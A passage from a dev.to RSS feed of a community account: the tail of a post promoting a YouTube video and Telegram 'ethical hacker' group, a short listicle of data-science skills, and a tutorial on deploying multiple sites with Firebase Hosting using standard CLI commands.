&lt;p&gt;&lt;strong&gt;Hey Guys we just dropped our 1st video on YouTube at 10 Am (IST) on 16 January 2020 .Please hit that subscribe button and make sure you smash that like button .Hotstar+Disney is a very famous streaming and entertainment service in India with more than 27 millon paid viewers and 300 millon monthly active users . We would love to hear your response .&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.youtube.com/watch?v=4pjpHUN28kk" rel="noopener noreferrer"&gt;https://www.youtube.com/watch?v=4pjpHUN28kk&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fvbprj0dselzoyybfclmn.png" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;*&lt;em&gt;Do you want to become ethical hacker and want to know how hackers hack in Real World. Join the telegram group and be a&lt;br&gt;
part of us *&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Telegram&lt;/strong&gt;  = &lt;a href="https://t.me/infosecbugbounty" rel="noopener noreferrer"&gt;https://t.me/infosecbugbounty&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Be a part of us 🚀 🚀&lt;br&gt;
Telegram &lt;a href="https://t.me/forthecommunity" rel="noopener noreferrer"&gt;https://t.me/forthecommunity&lt;/a&gt;&lt;br&gt;
Discord &lt;a href="https://discord.com/invite/QsAqC4yKkm" rel="noopener noreferrer"&gt;https://discord.com/invite/QsAqC4yKkm&lt;/a&gt;&lt;br&gt;
Facebook &lt;a href="https://www.facebook.com/forcommunity.tech" rel="noopener noreferrer"&gt;https://www.facebook.com/forcommunity.tech&lt;/a&gt;&lt;br&gt;
Youtube &lt;a href="https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ" rel="noopener noreferrer"&gt;https://www.youtube.com/channel/UCP33irJmpa60rIuztDP2itQ&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>5 Skills Required to be Data Scientist in 2021 🔥🔥</title>
      <dc:creator>Kiran Sethumadhavan</dc:creator>
      <pubDate>Wed, 06 Jan 2021 05:07:02 +0000</pubDate>
      <link>https://dev.to/forcommunity/5-skills-required-to-be-data-scientist-in-2021-5bod</link>
      <guid>https://dev.to/forcommunity/5-skills-required-to-be-data-scientist-in-2021-5bod</guid>
      <description>&lt;p&gt;Hello Developers  , today we are going to discuss 7 skills required by developers to become Data scientist in 2021.These skills are recommended by the data leader all around the world.&lt;/p&gt;

&lt;p&gt;1.Python&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F07rxnmy8bvtnyaiwxxe2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F07rxnmy8bvtnyaiwxxe2.png" alt="Alt Text" width="800" height="390"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Python is most used language all around the world and one of the growing programming language .Python has wide variety of libraries ,which is easy to learn . You should be able to write valuable scripts and build many applications like manipulating data, building machine learning models .&lt;/p&gt;

&lt;p&gt;2 Pandas&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fye9u0ictqtmv25y4zut3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fye9u0ictqtmv25y4zut3.png" alt="Alt Text" width="800" height="323"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Arguably the most important library to know in Python is Pandas, which a package for data manipulation and analysis. As a data scientist, you’ll be using this package all the time, whether you’re cleaning data, exploring data, or manipulating the data.&lt;br&gt;
Pandas has become such a prevalent package, not only because of it’s functionality, but also because Data Frames have become a standard data structure for machine learning models.&lt;/p&gt;

&lt;p&gt;3 SQL&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fptzv33yniqmo1yywezcw.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fptzv33yniqmo1yywezcw.jpg" alt="Alt Text" width="800" height="450"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As a Data scientist You should be able to extract data from database , manipulate data and create new models. Whether you’re a data scientist, a data engineer, or a data analyst, you’ll need to know SQL.Developing strong SQL skills will allow you to take your analyses, visualisations, and modelling to the next level because you will be able to extract and manipulate the data in advanced ways. Also, writing efficient and scalable queries is becoming more and more important for companies that work with petabytes of data.&lt;/p&gt;

&lt;p&gt;4 Docker&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F7ric21qf2f88rxd4onz8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F7ric21qf2f88rxd4onz8.png" alt="Alt Text" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docker is a containerisation platform that allows you to deploy and run applications, like machine learning models.&lt;br&gt;
It’s becoming increasingly important that data scientists not only know how to build models but how to deploy them as well. In fact, a lot of job postings are now requiring some experience in model deployment.&lt;br&gt;
The reason that it’s so important to learn how to deploy models is that a model delivers no business value until it is actually integrated with the process/product that it is associated with.&lt;/p&gt;

&lt;p&gt;5 Data Visualisation and Explanation&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Felvm0j8e9j2bhswvn03d.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Felvm0j8e9j2bhswvn03d.jpg" alt="Alt Text" width="800" height="492"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Data Visualisation means  data which is presented visually in form of bar and graph or any other conventional methods .&lt;/p&gt;

&lt;p&gt;As a Data Scientist you should be able to understand and explain the graph to others because you’re always selling your ideas and your models as a data scientist. And it’s especially important when communicating with others who are not as technologically savvy.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>programming</category>
      <category>dev</category>
      <category>programmer</category>
    </item>
    <item>
      <title>How to deploy multiple sites to firebase hosting?</title>
      <dc:creator>stephin007</dc:creator>
      <pubDate>Mon, 04 Jan 2021 02:45:08 +0000</pubDate>
      <link>https://dev.to/forcommunity/how-to-deploy-multiple-sites-to-firebase-hosting-38l3</link>
      <guid>https://dev.to/forcommunity/how-to-deploy-multiple-sites-to-firebase-hosting-38l3</guid>
      <description>&lt;p&gt;Wait, what..is that even possible... Cause one project in firebase means only one hosting for that particular project, Right..!&lt;br&gt;
Well, my fellow reader, Firebase has this feature to deploy multiple sites in a single firebase hosting. You might be wondering why do we need multiple websites for a single project, yeah I thought that too, so apparently, there might be situations, in which the user might need 2 separate apps i.e. one for customers, one for admin employees - both of which share the same database and functions.&lt;/p&gt;

&lt;p&gt;In this blog, let me walk through the steps which you will need to follow strictly to deploy the sites correctly to their respective domains.&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;em&gt;&lt;strong&gt;NOTE: I ASSUME THAT YOU HAVE ALREADY DEPLOYED ONE OF YOUR APPS TO YOUR FIREBASE PROJECT, OTHERWISE, YOU WON'T BE ABLE TO DEPLOY MULTIPLE SITES&lt;/strong&gt;&lt;/em&gt;
&lt;/h4&gt;

&lt;p&gt;Great, I hope you are still with me, Lets Begin.&lt;/p&gt;
&lt;h2&gt;
  
  
  1 Define Your Site Name(s)
&lt;/h2&gt;

&lt;p&gt;Assume, there is an e-commerce vendor, whose consumer app is done and deployed on firebase, now you are working on the admin site for the vendor which will help the user to add products to his e-commerce website.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;In the Firebase Hosting Console, scroll to the bottom under the &lt;strong&gt;Advanced Section&lt;/strong&gt; you will find an option to &lt;em&gt;Add Another Site&lt;/em&gt; , When you click that, you will see the below screen.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1609696086198%2FnuTKbffL8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1609696086198%2FnuTKbffL8.png" alt="multisite-hosting.png"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Add the site name for ex:  &lt;em&gt;admin-multi-site-magic&lt;/em&gt; , then you will see the site will be added like this.
&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fcdn.hashnode.com%2Fres%2Fhashnode%2Fimage%2Fupload%2Fv1609696215168%2FRCnnQS150.png" alt="multi-siteimage2.png"&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Wait, it's not over yet, you have just added the site, you have not deployed anything to your new site, lets see how that's done&lt;/p&gt;
&lt;h2&gt;
  
  
  2 Install the latest Firebase Tools and Initialize hosting
&lt;/h2&gt;

&lt;p&gt;You need Firebase Tools v4.2 or later for multisite hosting.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;npm i -g firebase-tools@latest
firebase -v

firebase init hosting
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;&lt;p&gt;One thing to note here, to make sure you add the word &lt;em&gt;hosting&lt;/em&gt; in the last command since firebase has a lot of functions so when you add hosting after init, it will understand that it needs to only initialize the hosting.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;It will prompt you some questions to select the project where you want to host it, make sure to select the correct project.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  3 Update the firebase.json
&lt;/h2&gt;

&lt;p&gt;As soon as you complete the above step, you will see that firebase adds 2 files to your project directory i.e. &lt;code&gt;.firebaserc&lt;/code&gt; &lt;code&gt;firebase.json&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now we just need to update this &lt;code&gt;firebase.json&lt;/code&gt; by adding a field called &lt;code&gt;target&lt;/code&gt;. Firebase uses this target, (yes you guessed it probably) to target the site to which your code needs to be deployed.&lt;/p&gt;

&lt;p&gt;If you are using React, your deployable code will be your &lt;code&gt;build&lt;/code&gt; folder&lt;br&gt;
and If you are using Angular, your deployable code will be your &lt;code&gt;dist&lt;/code&gt; folder.&lt;br&gt;
The name of the target can be anything, but better to keep it relevant to the site you are about to deploy. Add your target file as shown below, just above the public field&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "hosting": {
    "target": "admin",
    "public": "build",
    "ignore": [
      "firebase.json",
      "**/.*",
      "**/node_modules/**"
    ],
    "rewrites": [
      {
        "source": "**",
        "destination": "/index.html"
      }
    ]
  }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  4 Letting firebase know about the new target you just created.
&lt;/h2&gt;

&lt;p&gt;We need to associate the sites with a local target so Firebase knows which code to deploy where. We run the following command for each site: &lt;br&gt;
&lt;code&gt;firebase target:apply hosting &amp;lt;target-name&amp;gt; &amp;lt;resource-name&amp;gt;&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;firebase target:apply hosting admin admin-multi-site-magic

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;where the target-name is just a unique name you choose, and resource-name is the site from step 1.&lt;/p&gt;

&lt;h2&gt;
  
  
  5 Deploy to FIrebase
&lt;/h2&gt;

&lt;p&gt;We have done all the major steps, now we can deploy it to firebase to the targeted site.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;firebase deploy --only hosting
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And that's it, I hope you liked it if you do leave some reactions and comments. Also, I am open to collaboration you can mail us or ping us on any of the social media platforms.&lt;/p&gt;

</description>
      <category>firebase</category>
      <category>domain</category>
      <category>hosting</category>
    </item>
  </channel>
</rss>
